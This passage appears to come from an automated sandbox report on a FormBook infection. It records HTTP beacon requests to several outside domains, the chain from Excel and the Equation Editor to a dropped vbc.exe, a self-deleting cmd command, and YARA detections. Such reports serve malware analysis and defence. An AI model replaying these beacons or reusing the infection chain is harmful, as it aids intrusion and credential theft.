                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      6192.168.2.224918034.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:19:54.712455034 CEST600OUTGET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.thaysay.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:19:54.827491045 CEST600INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:19:54 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      7192.168.2.224918234.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:20:05.010581970 CEST602OUTGET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.onpar-golf.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:05.125579119 CEST603INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      8192.168.2.2249183192.99.131.25280C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:20:10.230083942 CEST604OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
                                                                                      Host: www.americanstonesusa.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:10.341188908 CEST604INHTTP/1.1 301 Moved Permanently
                                                                                      Date: Wed, 15 Sep 2021 09:20:10 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
                                                                                      Content-Length: 354
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6d 65 72 69 63 61 6e 73 74 6f 6e 65 73 75 73 61 2e 63 6f 6d 2f 6e 74 68 65 2f 3f 74 34 38 74 4a 3d 66 4a 45 70 5f 48 4e 38 6d 50 69 54 48 4e 35 50 26 61 6d 70 3b 35 6a 6f 34 6e 72 3d 54 69 57 6b 67 48 34 55 6b 43 37 43 49 71 7a 39 6b 74 63 52 51 79 53 6e 6f 74 2f 68 53 50 30 55 38 34 59 5a 6b 31 51 47 4f 35 7a 2f 68 41 52 69 6e 31 6e 67 36 72 78 55 34 59 2b 2b 73 79 36 59 64 47 70 69 7a 51 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      9192.168.2.224918434.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:20:15.364769936 CEST605OUTGET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:15.480021954 CEST606INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:15 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: EXCEL.EXE PID: 2920 Parent PID: 596

                                                                                      General

                                                                                      Start time:11:15:22
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                      Imagebase:0x13fa90000
                                                                                      File size:28253536 bytes
                                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate

                                                                                      Chronological Activities

                                                                                      Analysis Process: EQNEDT32.EXE PID: 2808 Parent PID: 596

                                                                                      General

                                                                                      Start time:11:15:45
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                      Imagebase:0x400000
                                                                                      File size:543304 bytes
                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: vbc.exe PID: 2976 Parent PID: 2808

                                                                                      General

                                                                                      Start time:11:15:48
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                      Imagebase:0x200000
                                                                                      File size:556544 bytes
                                                                                      MD5 hash:989933E361010648C467C6D7B6C2D812
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      Reputation:low

                                                                                      Chronological Activities

                                                                                      Analysis Process: vbc.exe PID: 836 Parent PID: 2976

                                                                                      General

                                                                                      Start time:11:15:51
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\Public\vbc.exe
                                                                                      Imagebase:0x200000
                                                                                      File size:556544 bytes
                                                                                      MD5 hash:989933E361010648C467C6D7B6C2D812
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low

                                                                                      Chronological Activities

                                                                                      Analysis Process: vbc.exe PID: 2636 Parent PID: 2976

                                                                                      General

                                                                                      Start time:11:15:52
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\vbc.exe
                                                                                      Imagebase:0x200000
                                                                                      File size:556544 bytes
                                                                                      MD5 hash:989933E361010648C467C6D7B6C2D812
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Chronological Activities

                                                                                      Analysis Process: explorer.exe PID: 1764 Parent PID: 2636

                                                                                      General

                                                                                      Start time:11:15:54
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                      Imagebase:0xffa10000
                                                                                      File size:3229696 bytes
                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: ipconfig.exe PID: 1012 Parent PID: 2636

                                                                                      General

                                                                                      Start time:11:16:21
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                                      Imagebase:0x2f0000
                                                                                      File size:27136 bytes
                                                                                      MD5 hash:CABB20E171770FF64614A54C1F31C033
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:moderate

                                                                                      Chronological Activities

                                                                                      Analysis Process: cmd.exe PID: 2688 Parent PID: 1012

                                                                                      General

                                                                                      Start time:11:16:22
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                      Imagebase:0x4acd0000
                                                                                      File size:302592 bytes
                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >

                                                                                        Analysis Process: vbc.exe PID: 2976 Parent PID: 2808 vbc.exeCOMMON

                                                                                        Executed Functions

                                                                                        Function 001E1700, Relevance: 2.8, Strings: 2, Instructions: 255COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <),($r5`
                                                                                        • API String ID: 0-4244084516
                                                                                        • Opcode ID: 2c604e9587d7ad485f7139dae1d8bcc42232d7a74a840b48c4852a91f4e29694
                                                                                        • Instruction ID: d9140eff2769140a4a68af50a98da7dcbf36b649a0414f4c565003cca55d81a7
                                                                                        • Opcode Fuzzy Hash: 2c604e9587d7ad485f7139dae1d8bcc42232d7a74a840b48c4852a91f4e29694
                                                                                        • Instruction Fuzzy Hash: 25B10471D056199FCB28CFA6C9816DEFBB2FF89300F24946AD409BB254D734AA468F50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E1121, Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Q%p.$tsA
                                                                                        • API String ID: 0-624219625
                                                                                        • Opcode ID: 93164f59355ec964dab8908bda2b25e334957735a8fd5ff0784bf81e5487b448
                                                                                        • Instruction ID: 41521f9da71e5d9c16ac527313c859bc6cc20a8a6f55f8481c152558f75b166b
                                                                                        • Opcode Fuzzy Hash: 93164f59355ec964dab8908bda2b25e334957735a8fd5ff0784bf81e5487b448
                                                                                        • Instruction Fuzzy Hash: E9710374E05248DFDB48CFAAD9409AEBBF2FF89310F10846AE519AB365DB309941CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E5CA9, Relevance: 1.7, Strings: 1, Instructions: 415COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: gsG+
                                                                                        • API String ID: 0-3263620653
                                                                                        • Opcode ID: 0acc08e12b5890713e6b63c72ec96b022a8dbf8f931f9c9b150d3da439382c27
                                                                                        • Instruction ID: 91ea44322abab85dedf1617a5af78a6d10a77dd8ece4d3c63c78786a61654ffe
                                                                                        • Opcode Fuzzy Hash: 0acc08e12b5890713e6b63c72ec96b022a8dbf8f931f9c9b150d3da439382c27
                                                                                        • Instruction Fuzzy Hash: FDF19F70909686DFCB09CFA6C8958EEFFB2FF89300B64855AD405A7265C3359B42CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E5D90, Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: gsG+
                                                                                        • API String ID: 0-3263620653
                                                                                        • Opcode ID: b7e629859178279c7325eb031977335b4763ada17211fb7a6a9929fce3012d3d
                                                                                        • Instruction ID: f7d5de468564eb7c9977223b3c12a4cbff3d21576966e3e58f7c262a78b04628
                                                                                        • Opcode Fuzzy Hash: b7e629859178279c7325eb031977335b4763ada17211fb7a6a9929fce3012d3d
                                                                                        • Instruction Fuzzy Hash: 1AD16E70D04A0ADFCB08CF96C5854AEFBB2FF89305F65C459D516A7224D734AA42CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E1B00, Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: C6e:
                                                                                        • API String ID: 0-1451620285
                                                                                        • Opcode ID: f2b0a3616bed3e5e95ab0100395f01c2ad557033f74a9c9fb3eee8c820455e65
                                                                                        • Instruction ID: c5791bda4cd0187a4d20f666969a6815a09ba3091417d5d173a29401b33f172f
                                                                                        • Opcode Fuzzy Hash: f2b0a3616bed3e5e95ab0100395f01c2ad557033f74a9c9fb3eee8c820455e65
                                                                                        • Instruction Fuzzy Hash: B4B13874E056599BCB08CFEAC9805EEFBF2BF88310F648565D409AB358E7349941CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E04E1, Relevance: .4, Instructions: 381COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5e87f29c794f9585a79fc744fe17788cefac196b63cfc0b2f0762a4ebb6bb240
                                                                                        • Instruction ID: 39a79c0192367114f7a2cddee927b01d0c995b1459ed79c056ea123b37d9c2d3
                                                                                        • Opcode Fuzzy Hash: 5e87f29c794f9585a79fc744fe17788cefac196b63cfc0b2f0762a4ebb6bb240
                                                                                        • Instruction Fuzzy Hash: F902D634A11218CFCB14DFB4C891ADDB7B2FF8A304F1195A9E409AB365DB70A985CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E009C, Relevance: .4, Instructions: 377COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 32535466e97d7ed346659ef1c051c47622405e88998c8b570d6279b45ebd8365
                                                                                        • Instruction ID: c23a6db24059583559326ac5dc3654c5efdbd3eb3d008a3458d4cedbeadb7fec
                                                                                        • Opcode Fuzzy Hash: 32535466e97d7ed346659ef1c051c47622405e88998c8b570d6279b45ebd8365
                                                                                        • Instruction Fuzzy Hash: FBF1D534A11219CFCB14DFB4C891AADB7B2FF89304F1195A9E409AB365DB30A986CF51
